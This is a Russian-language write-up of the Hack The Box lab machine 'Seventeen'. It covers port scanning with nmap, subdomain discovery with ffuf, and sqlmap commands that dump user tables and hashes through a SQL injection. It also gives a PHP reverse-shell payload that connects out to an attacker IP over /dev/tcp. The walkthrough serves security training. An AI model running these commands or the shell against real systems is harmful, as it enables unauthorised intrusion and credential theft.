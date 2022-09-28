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Наша цель — захват машины Seventeen с тренировочной площадки Hack The Box. Задание оценено как сложное.
warning
Подключаться к машинам с HTB рекомендуется только через VPN. Не делай этого с компьютеров, где есть важные для тебя данные, так как ты окажешься в общей сети с другими участниками.
Разведка
Сканирование портов
Добавляем IP-адрес машины в
/:
10.10.11.165 seventeen.htb
И запускаем сканирование портов.
Справка: сканирование портов
Сканирование портов — стандартный первый шаг при любой атаке. Он позволяет атакующему узнать, какие службы на хосте принимают соединение. На основе этой информации выбирается следующий шаг к получению точки входа.
Наиболее известный инструмент для сканирования — это Nmap. Улучшить результаты его работы ты можешь при помощи следующего скрипта.
#!/bin/bashports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)nmap -p$ports -A $1
Он действует в два этапа. На первом производится обычное быстрое сканирование, на втором — более тщательное сканирование, с использованием имеющихся скриптов (опция
-A).
Видим три открытых порта:
- 22 — служба OpenSSH 7.6p1;
- 80 — веб‑сервер Apache 2.4.29;
- 8000 — веб‑сервер Apache 2.4.38.
Нам доступно сразу два веб‑сервера, с которых и начнем пробивать периметр.
Осмотревшись на сайте, находим подтверждение тому, что в самом начале выбрали верное доменное имя.
Больше ничего интересного нет, поэтому перейдем к активному сканированию.
Точка входа
Итак, я попробую поискать скрытые файлы и каталоги. Делать это я буду при помощи сканера ffuf.
Справка: сканирование веба c ffuf
Одно из первых действий при тестировании безопасности веб‑приложения — это сканирование методом перебора каталогов, чтобы найти скрытую информацию и недоступные обычным посетителям функции. Для этого можно использовать программы вроде dirsearch и DIRB.
Я предпочитаю легкий и очень быстрый ffuf. При запуске указываем следующие параметры:
-
-w— словарь (я использую словари из набора SecLists);
-
-t— количество потоков;
-
-u— URL;
-
-fc— исключить из результата ответы с кодом 403.
ffuf -u 'http://seventeen.htb/FUZZ' -t 256 -w directory_2.3_medium_lowercase.txt
Сканирование каталогов ничего интересного не дало. Других HTML-страниц тоже не нашлось. Остается просканировать поддомены. В этом случае мы будем перебирать заголовок
Host в параметре
-H. Так как все ответы будут вести на основной домен, можем их отфильтровать по размеру страницы в параметре
--fs.
ffuf -u 'http://seventeen.htb/' -t 256 -w subdomains-top1million-110000.txt -H 'Host: FUZZ.seventeen.htb' --fs 20689
Находим один поддомен, запись для которого добавляем в
/.
10.10.11.165 seventeen.htb exam.seventeen.htb
Exam Reviewer Management System
На сайте нас встречает Exam Reviewer Management System, для которой мы легко находим публичный эксплоит в базе Exploit-DB. Это SQL-инъекция.
Нам предоставляют готовую нагрузку, которой непременно стоит воспользоваться. Первым делом запустим sqlmap.
sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' -p id --level 3
Sqlmap нашел нагрузку, теперь получим базы данных (параметр
--dbs).
sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' -p id --dbs --level 3
Отмечаем для себя, что на сервере используются и другие платформы, включая Roundcube. Начнем с первой базы, получим таблицы (параметр
--tables) из базы
db_sfms (параметр
-D).
sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' -D db_sfms --tables
Давай сдампим (параметр
--dump) таблицы
user и
student (параметр
-T). Для быстроты используем десять потоков (параметр
--threads).
sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' --threads 10 -D db_sfms -T user --dump
sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' --threads 10 -D db_sfms -T student --dump
Получили много хешей, что не может не радовать. Теперь перейдем к базе
erms_db и по привычному сценарию сначала узнаем таблицы.
sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' --threads 10 -D erms_db --tables
Из этой базы тоже сдампим пользователей.
sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' --threads 10 -D erms_db -T users --dump
Кроме хешей, мы раскрываем каталог с аватарами, а это неизвестная до данного момента директория на веб‑сервере —
/! Из Roundcube ничего не получаем, поэтому с помощью онлайновой базы крякаем хеши.
Получаем один пароль, с которым попробуем пойти на найденный сайт — School File Management System.
Точка опоры
После авторизации видим загруженный файл, который мы, конечно же, скачаем.
Немного почитав про эту систему, я узнал о возможности загрузить и выполнить файл на PHP. Файл будет расположен в каталоге
/. В качестве реверс‑шелла загружаем простой скрипт:
<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.16/4321 0>&1'"); ?>
Обращаемся к нашему скрипту по следующему адресу:
http://seventeen.htb:8000/oldmanagement/files/31234/reverse.php
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